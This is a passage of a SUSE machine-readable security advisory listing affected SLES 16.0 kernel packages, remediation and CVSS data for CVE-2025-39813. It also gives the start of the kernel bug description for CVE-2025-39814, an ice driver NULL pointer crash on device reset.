"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39813",
"url": "https://www.suse.com/security/cve/CVE-2025-39813"
},
{
"category": "external",
"summary": "SUSE Bug 1250032 for CVE-2025-39813",
"url": "https://bugzilla.suse.com/1250032"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39813"
},
{
"cve": "CVE-2025-39814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: fix NULL pointer dereference in ice_unplug_aux_dev() on reset\n\nIssuing a reset when the driver is loaded without RDMA support, will\nresults in a crash as it attempts to remove RDMA\u0027s non-existent auxbus\ndevice:\necho 1 \u003e /sys/class/net/\u003cif\u003e/device/reset\n\nBUG: kernel NULL pointer dereference, address: 0000000000000008\n...\nRIP: 0010:ice_unplug_aux_dev+0x29/0x70 [ice]\n...\nCall Trace:\n\u003cTASK\u003e\nice_prepare_for_reset+0x77/0x260 [ice]\npci_dev_save_and_disable+0x2c/0x70\npci_reset_function+0x88/0x130\nreset_store+0x5a/0xa0\nkernfs_fop_write_iter+0x15e/0x210\nvfs_write+0x273/0x520\nksys_write+0x6b/0xe0\ndo_syscall_64+0x79/0x3b0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nice_unplug_aux_dev() checks pf-\u003ecdev_info-\u003eadev for NULL pointer, but\npf-\u003ecdev_info will also be NULL, leading to 